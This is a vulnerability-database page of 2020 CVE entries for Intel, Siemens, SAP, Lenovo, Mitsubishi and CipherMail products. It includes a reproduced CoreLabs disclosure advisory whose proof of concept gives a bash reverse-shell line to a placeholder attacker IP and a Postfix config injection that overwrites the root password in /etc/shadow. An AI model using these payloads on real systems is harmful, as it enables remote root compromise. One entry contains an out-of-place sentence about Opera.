VARIoT IoT vulnerabilities database

VAR-202006-0256 | CVE-2020-0541 | Out-of-bounds write vulnerability in Intel(R) CSME |
CVSS V2: 4.6 CVSS V3: 6.7 Severity: MEDIUM |
Out-of-bounds write in subsystem for Intel(R) CSME versions before 12.0.64, 13.0.32, 14.0.33 and 14.5.12 may allow a privileged user to potentially enable escalation of privilege via local access. Intel(R) CSME is vulnerable to an out-of-bounds write. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Intel Converged Security and Management Engine (CSME) is a security management engine of Intel Corporation. A buffer error vulnerability exists in a subsystem in Intel CSME. A local attacker could exploit this vulnerability to elevate privileges. The following products and versions are affected: Intel CSME versions prior to 12.0.64, versions prior to 13.0.32, versions prior to 14.0.33, and versions prior to 14.5.12.
VAR-202006-0242 | CVE-2020-0545 | Integer overflow vulnerability in multiple Intel products |
CVSS V2: 2.1 CVSS V3: 4.4 Severity: MEDIUM |
Integer overflow in subsystem for Intel(R) CSME versions before 11.8.77, 11.12.77, 11.22.77 and Intel(R) TXE versions before 3.1.75, 4.0.25 and Intel(R) Server Platform Services (SPS) versions before SPS_E5_04.01.04.380.0, SPS_SoC-X_04.00.04.128.0, SPS_SoC-A_04.00.04.211.0, SPS_E3_04.01.04.109.0, SPS_E3_04.08.04.070.0 may allow a privileged user to potentially enable denial of service via local access. Intel Converged Security and Management Engine (CSME) and others are products of Intel Corporation of the United States. Intel Converged Security and Management Engine is a security management engine. Intel TXE is a trusted execution engine with a hardware authentication function used in the CPU (Central Processing Unit). Subsystems in Intel CSME, TXE, and SPS have security vulnerabilities. A local attacker could exploit this vulnerability to cause a denial of service. The following products and versions are affected: Intel CSME before 11.8.77, before 11.12.77, before 11.22.77; TXE before 3.1.75, before 4.0.25; SPS versions before SPS_E5_04.01.04.380.0, before SPS_SoC-X_04.00.04.128.0, before SPS_SoC-A_04.00.04.211.0, before SPS_E3_04.01.04.109.0, and before SPS_E3_04.08.04.070.0.
VAR-202006-0239 | CVE-2020-0566 | Privilege management vulnerability in Intel(R) TXE |
CVSS V2: 4.6 CVSS V3: 6.8 Severity: MEDIUM |
Improper Access Control in subsystem for Intel(R) TXE versions before 3.175 and 4.0.25 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. A privilege management vulnerability exists in Intel(R) TXE. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Intel TXE is a trusted execution engine with a hardware verification function in the CPU (Central Processing Unit) of Intel Corporation of the United States. There are security vulnerabilities in the subsystems of Intel TXE versions prior to 3.175 and versions prior to 4.0.25. An attacker in physical proximity could exploit this vulnerability to elevate privileges.
VAR-202006-0395 | CVE-2020-12713 | Privilege management vulnerability in CipherMail Gateway and Webmail Messenger |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. A privilege management vulnerability exists in CipherMail Gateway and Webmail Messenger. Information may be obtained or tampered with, and service operation may be interrupted (DoS). CipherMail Webmail Messenger is a webmail add-on for the CipherMail encryption gateway. An attacker could exploit this vulnerability to elevate privileges to root. An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client. The CoreLabs advisory follows: CipherMail Multiple Vulnerabilities
1. Advisory Information
Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-0008
Advisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities
Date published: 2020-05-28
Date of last update: 2020-05-28
Vendors contacted: CipherMail
Release mode: Coordinated release
2. Vulnerability Information
Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-12713, CVE-2020-12714
3. Vulnerability Description
CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]
Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary commands on the operating system with elevated privileges.
4. Vulnerable Packages
CipherMail Community Virtual Appliance version 4.6.2.
Other products and versions might be affected, but have not yet been tested.
5. Vendor Information, Solutions, and Workarounds
The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2
Patch instructions for older releases are also available.
6. Credits
This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services.
The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team.
7. Technical Description / Proof of Concept Code
CipherMail Community Virtual Appliance is an open source virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services.
Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system.
7.1 Remote Command Execution Via Backup Restore
[CVE-2020-12713] The CipherMail Web Management console provides a system backup functionality, accessible only to the administrator role, which allows administrators to back up or restore the system settings. This capability is affected by a remote code execution vulnerability.
The following proof of concept demonstrates the vulnerability:
1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files.
2. The obtained file should then be decompressed. The word system, followed by the command to be executed, can then be appended at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:
-- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64)
--
-- Host: localhost Database: djigzo
-- ------------------------------------------------------
-- Server version 10.2.21-MariaDB
[...]
--
-- Dumping data for table `cm_users`
--
LOCK TABLES `cm_users` WRITE;
/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;
INSERT INTO `cm_users` VALUES (1,'susucutrule@mailinator.com',5);
/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1
-- Dump completed on 2019-03-28 18:48:05
3. It is then necessary to recompress the modified file together with the other files into a new tar.gz archive and invoke the restore backup functionality from the administration console.
4. Finally, the command is executed on the backend server and a reverse shell should be obtained. The reverse shell runs in the context of the user running the database server.
7.2 Configuration File Injection Leading to Code Execution as Root
[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s main.cf configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file.
The following proof of concept demonstrates the vulnerability:
The next four lines should be added in order to replace the root password in the system:
[main.cf Postfix configuration file]
[…]
always_bcc = johnny@test.com
multi_instance_enable=yes
multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow
multi_instance_directories=/tmp
[…]
After the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed to by multi_instance_wrapper is executed.
In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (the syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a DES password hash using bash, we first executed the following command:
$ mkpasswd -m des
Password: pentest
KoVhDRK7oesZg
As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest.
It is now possible to establish an SSH connection (the SSH server is enabled by default) and log in as the root user with the newly set password.
8. Report Timeline
2020-04-07 - Vulnerability discovered by CoreLabs.
2020-04-30 - First contact made with the vendor.
2020-04-30 - Answer received and advisory draft provided to CipherMail.
2020-04-30 - Vulnerabilities recognized by the vendor.
2020-05-21 - CVEs requested and received from Mitre.
2020-05-28 - Fix and release changes published by vendor.
2020-05-28 - Advisory published.
9. References
[1] https://www.ciphermail.com/
[2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html
10. About CoreLabs
CoreLabs, the research center of Core Security, A HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.
11. About Core Security, A HelpSystems Company
Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
VAR-202006-0396 | CVE-2020-12714 | Cryptographic strength vulnerability in CipherMail Gateway and Webmail Messenger |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
An issue was discovered in CipherMail Community Gateway Virtual Appliances and Professional/Enterprise Gateway Virtual Appliances versions 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger Virtual Appliances 1.1.1 through 3.1.1-0. A Diffie-Hellman parameter of insufficient size could allow man-in-the-middle compromise of communications between CipherMail products and external SMTP clients. A cryptographic strength vulnerability exists in CipherMail Gateway and Webmail Messenger. Information may be obtained. The CoreLabs advisory CORE-2020-0008 (CipherMail Multiple Vulnerabilities), which covers this CVE together with CVE-2020-12713, is reproduced in full under the CVE-2020-12713 entry above.
VAR-202006-1953 | No CVE | GX Works2 has a denial of service vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
GX Works2 is PLC programming software developed by Mitsubishi Electric Automation Co., Ltd. It is a programming tool dedicated to PLC design, debugging, and maintenance. Compared with the traditional GX Developer software, it has improved functions and operating performance and has become easier to use.
GX Works2 has a denial of service vulnerability. When the PLC online read function is triggered, malformed data sent by the PLC to GX Works2 through a private protocol causes a heap overflow, which leads to a denial of service and may allow remote code execution.
VAR-202006-1351 | CVE-2020-6275 | Server-side request forgery vulnerability in SAP NetWeaver AS ABAP |
CVSS V2: 6.8 CVSS V3: 9.8 Severity: CRITICAL |
SAP NetWeaver AS ABAP, versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, are vulnerable to a Server-Side Request Forgery attack in which an attacker can use inappropriate path names containing malicious server names in the import/export of sessions functionality and coerce the web server into authenticating with the malicious server. Furthermore, if NTLM is set up, the attacker can compromise confidentiality, integrity and availability of the SAP database. SAP NetWeaver AS ABAP contains a server-side request forgery vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
VAR-202006-1349 | CVE-2020-6270 | Vulnerability related to lack of authentication in SAP NetWeaver AS ABAP |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
SAP NetWeaver AS ABAP (Banking Services), versions 710, 711, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, does not perform necessary authorization checks for an authenticated user due to a Missing Authorization Check, allowing wrong and unexpected changes of individual conditions by a malicious user, leading to wrong prices. A vulnerability related to lack of authentication exists in SAP NetWeaver AS ABAP (Banking Services). Information may be obtained or tampered with.
VAR-202006-1800 | CVE-2020-8321 | Unspecified vulnerability in multiple Lenovo Notebook and ThinkStation models |
CVSS V2: 4.6 CVSS V3: 6.7 Severity: MEDIUM |
A potential vulnerability in the SMI callback function used in the System Lock Preinstallation driver in some Lenovo Notebook and ThinkStation models may allow arbitrary code execution. Multiple Lenovo Notebook and ThinkStation models contain unspecified vulnerabilities. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
VAR-202006-1828 | CVE-2020-7580 | Unquoted search path or element vulnerability in multiple SIMATIC products |
CVSS V2: 7.2 CVSS V3: 6.7 Severity: MEDIUM |
A vulnerability has been identified in SIMATIC Automation Tool (All versions < V4 SP2), SIMATIC NET PC Software V14 (All versions < V14 SP1 Update 14), SIMATIC NET PC Software V15 (All versions), SIMATIC NET PC Software V16 (All versions < V16 Upd3), SIMATIC PCS neo (All versions < V3.0 SP1), SIMATIC ProSave (All versions < V17), SIMATIC S7-1500 Software Controller (All versions < V21.8), SIMATIC STEP 7 (TIA Portal) V13 (All versions < V13 SP2 Update 4), SIMATIC STEP 7 (TIA Portal) V14 (All versions < V14 SP1 Update 10), SIMATIC STEP 7 (TIA Portal) V15 (All versions < V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions < V16 Update 2), SIMATIC STEP 7 V5 (All versions < V5.6 SP2 HF3), SIMATIC WinCC OA V3.16 (All versions < V3.16 P018), SIMATIC WinCC OA V3.17 (All versions < V3.17 P003), SIMATIC WinCC Runtime Advanced (All versions < V16 Update 2), SIMATIC WinCC Runtime Professional V13 (All versions < V13 SP2 Update 4), SIMATIC WinCC Runtime Professional V14 (All versions < V14 SP1 Update 10), SIMATIC WinCC Runtime Professional V15 (All versions < V15.1 Update 5), SIMATIC WinCC Runtime Professional V16 (All versions < V16 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 14), SIMATIC WinCC V7.5 (All versions < V7.5 SP1 Update 3), SINAMICS STARTER (All Versions < V5.4 HF2), SINAMICS Startdrive (All Versions < V16 Update 3), SINEC NMS (All versions < V1.0 SP2), SINEMA Server (All versions < V14 SP3), SINUMERIK ONE virtual (All Versions < V6.14), SINUMERIK Operate (All Versions < V6.14). A common component used by the affected applications regularly calls a helper binary with SYSTEM privileges while the call path is not quoted. This could allow a local attacker to execute arbitrary code with SYSTEM privileges. Multiple SIMATIC products contain an unquoted search path or element vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
Opera Software, Opera, etc. are all products of Opera Software in Norway; Opera is a web browser. Siemens SIMATIC S7-1500, etc. are all products of Siemens, Germany. SIMATIC S7-1500 is a programmable logic controller. SIMATIC WinCC is an automated data acquisition and monitoring (SCADA) system. Code issue vulnerabilities exist in several products. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products.
VAR-202006-1521 | CVE-2020-7586 | Out-of-bounds write vulnerabilities in multiple Siemens products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP3), SIMATIC PDM (All versions < V9.2), SIMATIC STEP 7 V5.X (All versions < V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 HF2). A buffer overflow vulnerability could allow a local attacker to cause a Denial-of-Service situation. The security vulnerability could be exploited by an attacker with local access to the affected systems. Successful exploitation requires user privileges but no user interaction. The vulnerability could allow an attacker to compromise the availability of the system as well as to have access to confidential information. Multiple Siemens products are vulnerable to out-of-bounds writes. Information may be obtained or tampered with, and service operation may be interrupted (DoS). A buffer error vulnerability exists in several Siemens products.
VAR-202006-1522 | CVE-2020-7589 | Vulnerability regarding lack of authentication for critical features in LOGO!8 BM |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). The vulnerability could lead to an attacker reading and modifying the device configuration and obtaining project files from affected devices. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts confidentiality, integrity, and availability of the device. At the time of advisory publication no public exploitation of this security vulnerability was known. LOGO!8 BM (incl. SIPLUS variants) lacks authentication for critical features. Information may be obtained or tampered with. Siemens LOGO! 8 BM is a programmable logic controller of Siemens, Germany.
There is an access control error vulnerability in Siemens LOGO! 8 BM (all versions), which stems from the lack of ID verification in the program.
VAR-202006-0119 | CVE-2020-13238 | Resource exhaustion vulnerability in the Ethernet port of the Mitsubishi Electric MELSEC iQ-R series |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
Mitsubishi MELSEC iQ-R Series PLCs with firmware 33 allow attackers to halt the industrial process by sending an unauthenticated crafted packet over the network, because this denial of service attack consumes excessive CPU time. After halting, physical access to the PLC is required in order to restore production. A resource exhaustion vulnerability (CWE-400) exists in the MELSEC iQ-R series units provided by Mitsubishi Electric Corporation. This vulnerability information was provided by the developer for the purpose of making it known to product users, reported to JPCERT/CC, and coordinated by JPCERT/CC with the developer. When a malicious packet is received from a remote third party, Ethernet port communication may be put into a denial-of-service (DoS) state; a reset is required for recovery. The Mitsubishi Electric MELSEC iQ-R series is a programmable logic controller manufactured by Mitsubishi Electric, Japan.
VAR-202009-1520 | CVE-2020-8333 | Unspecified vulnerability in multiple Lenovo Desktop and ThinkStation models |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A potential vulnerability in the SMI callback function used in the EEPROM driver in some Lenovo Desktops and ThinkStation models may allow arbitrary code execution. Multiple Lenovo Desktop and ThinkStation models contain unspecified vulnerabilities. Information may be obtained or tampered with, and service may be disrupted (DoS).
VAR-202006-0026 | CVE-2020-0596 | Input validation vulnerability in Intel(R) AMT and ISM |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Improper input validation in DHCPv6 subsystem in Intel(R) AMT and Intel(R) ISM versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an unauthenticated user to potentially enable information disclosure via network access. An input validation vulnerability exists in Intel(R) AMT and ISM. Information may be obtained. Both Intel Active Management Technology (AMT) and Intel Software Manager (ISM) are products of Intel Corporation of the United States. Intel Active Management Technology is a set of hardware-based computer remote active management technology software. Intel Software Manager is a utility for managing Intel software development products. A remote attacker could exploit this vulnerability to obtain information. The following products and versions are affected: Intel AMT before 11.8.77, before 11.12.77, before 11.22.77, before 12.0.64; ISM before 11.8.77, before 11.12.77, before 11.22.77, before 12.0.64.
VAR-202006-0253 | CVE-2020-0538 | Input validation vulnerability in Intel(R) AMT |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Improper input validation in a subsystem of Intel(R) AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an unauthenticated user to potentially enable denial of service via network access. Intel(R) AMT contains an input validation vulnerability; the service may be put into a denial of service (DoS) state. Intel Active Management Technology (AMT) is a set of hardware-based technology for remote, out-of-band management of computers, developed by Intel Corporation. An unauthenticated remote attacker could exploit this vulnerability to cause a denial of service. The following products and versions are affected: Intel AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64
VAR-202006-1520 | CVE-2020-7585 | Uncontrolled search path element vulnerability in multiple Siemens products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP3), SIMATIC PDM (All versions < V9.2), SIMATIC STEP 7 V5.X (All versions < V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 HF2). A DLL hijacking vulnerability could allow a local attacker to execute code with elevated privileges. The vulnerability can be exploited by an attacker with local access to the affected systems; successful exploitation requires user privileges but no user interaction. It could allow an attacker to compromise the availability of the system as well as to gain access to confidential information. The affected Siemens products contain an uncontrolled search path element (CWE-427): the application resolves a DLL by name through a search order that includes directories a low-privileged user can write to, so a planted DLL of the same name is loaded in place of the legitimate one. Information may be obtained, information may be tampered with, and the service may be put into a denial of service (DoS) state
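The entry above names the weakness class but not how to reason about it. The following is an added example written for this page; it is not code from Siemens or from the VARIoT entry. It models the default Windows DLL search order and reports, for a DLL that a program loads by bare name, the directories where a low-privileged user could plant a same-named file that the loader would pick up first. All directory names, the DLL names and the set of user-writable directories are constructed for illustration; on a real host the writable set would come from ACL checks (for example `icacls`), not from a literal. The `resolve_trusted` function is a hypothetical hardened counterpart that loads only from an allow-list of directories and fails closed.

```python
# Added example for CWE-427 (uncontrolled search path element). Not vendor code;
# host layout, DLL names and the writable-directory set are constructed.
from typing import Iterable, List, Set


def dll_search_order(app_dir: str, windows_dir: str, cwd: str,
                     path_entries: Iterable[str]) -> List[str]:
    """Default LoadLibrary search order with SafeDllSearchMode enabled:
    application directory, System32, the 16-bit System directory, the
    Windows directory, the current working directory, then each PATH
    entry in order."""
    return [
        app_dir,
        windows_dir + r"\System32",
        windows_dir + r"\System",
        windows_dir,
        cwd,
        *path_entries,
    ]


def find_hijack_points(order: List[str], present_in: Set[str],
                       user_writable: Set[str]) -> List[str]:
    """Directories, in search order, where a low-privileged user could
    plant a same-named DLL that the loader would take before the
    legitimate copy.

    The walk stops at the first directory that already holds the DLL: the
    loader uses that copy, so later directories are irrelevant. If the DLL
    is present nowhere (a 'phantom' DLL the binary merely probes for),
    every writable directory in the order is a hijack point."""
    points: List[str] = []
    for directory in order:
        if directory in present_in:
            break
        if directory in user_writable:
            points.append(directory)
    return points


def resolve_trusted(dll_name: str, trusted_dirs: List[str],
                    present_in: Set[str]) -> str:
    """Hypothetical hardened loader: fully qualified path from an
    allow-list only (the effect of SetDefaultDllDirectories /
    LOAD_LIBRARY_SEARCH_SYSTEM32), never falling back to CWD or PATH.
    Raises instead of loading from an untrusted location."""
    for directory in trusted_dirs:
        if directory in present_in:
            return directory + "\\" + dll_name
    raise FileNotFoundError(f"{dll_name} not found in any trusted directory")


if __name__ == "__main__":
    # Constructed engineering-workstation layout: the user can write to
    # Downloads (the CWD when a project file is double-clicked) and to a
    # tools directory that an earlier installer appended to PATH.
    APP_DIR = r"C:\Program Files\Vendor\EngineeringTool"
    WINDOWS = r"C:\Windows"
    CWD = r"C:\Users\alice\Downloads"
    PATH = [r"C:\Windows\System32", r"C:\Tools"]
    WRITABLE = {CWD, r"C:\Tools"}

    order = dll_search_order(APP_DIR, WINDOWS, CWD, PATH)

    # A system DLL found in System32 before any writable directory: no exposure.
    print(find_hijack_points(order, {r"C:\Windows\System32"}, WRITABLE))  # -> []

    # A DLL the vendor ships only on PATH (C:\Tools): CWD is searched first.
    print(find_hijack_points(order, {r"C:\Tools"}, WRITABLE))  # -> [CWD]

    # A phantom DLL that is never installed: every writable directory works.
    print(find_hijack_points(order, set(), WRITABLE))  # -> [CWD, C:\Tools]

    # Hardened loader: allow-list only, so the phantom DLL fails closed.
    print(resolve_trusted("version.dll", [APP_DIR, WINDOWS + r"\System32"],
                          {r"C:\Windows\System32"}))
```

The walk shows why the usual fixes work: loading by fully qualified path or restricting the search to System32 and the application directory removes CWD and PATH from the order entirely, and removing user-writable directories from PATH (or tightening their ACLs) empties the set that `find_hijack_points` reports.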
VAR-202006-0257 | CVE-2020-0542 | Buffer error vulnerability in Intel(R) CSME |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Improper buffer restrictions in a subsystem of Intel(R) CSME versions before 12.0.64, 13.0.32, 14.0.33 and 14.5.12 may allow an authenticated user to potentially enable escalation of privilege, information disclosure or denial of service via local access. Intel(R) CSME contains a buffer error vulnerability. Information may be obtained, information may be tampered with, and the service may be put into a denial of service (DoS) state. Intel Converged Security and Management Engine (CSME) is a security and management engine of Intel Corporation. A local, authenticated attacker could exploit this vulnerability to elevate privileges, disclose information or cause a denial of service. The following products and versions are affected: Intel CSME versions before 12.0.64, 13.0.32, 14.0.33 and 14.5.12
VAR-202006-0248 | CVE-2020-0533 | Insufficiently strong password hash vulnerability in Intel(R) CSME |
CVSS V2: 4.6 CVSS V3: 6.7 Severity: MEDIUM |
A reversible one-way hash in Intel(R) CSME versions before 11.8.76, 11.12.77 and 11.22.77 may allow a privileged user to potentially enable escalation of privilege, denial of service or information disclosure via local access. Intel(R) CSME uses a password hash that is not strong enough: because the stored value can be reversed, a privileged local user who can read it can recover the original secret. Information may be obtained, information may be tampered with, and the service may be put into a denial of service (DoS) state. Intel Converged Security and Management Engine (CSME) is a security and management engine of Intel Corporation. The following products and versions are affected: Intel CSME versions before 11.8.76, 11.12.77 and 11.22.77
VAR-202006-0245 | CVE-2020-0531 | Input validation vulnerability in Intel(R) AMT |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Improper input validation in Intel(R) AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an authenticated user to potentially enable information disclosure via network access. Intel(R) AMT contains an input validation vulnerability; information may be obtained. Intel Active Management Technology (AMT) is a set of hardware-based technology for remote, out-of-band management of computers, developed by Intel Corporation. An authenticated remote attacker could exploit this vulnerability to obtain information. The following products and versions are affected: Intel AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64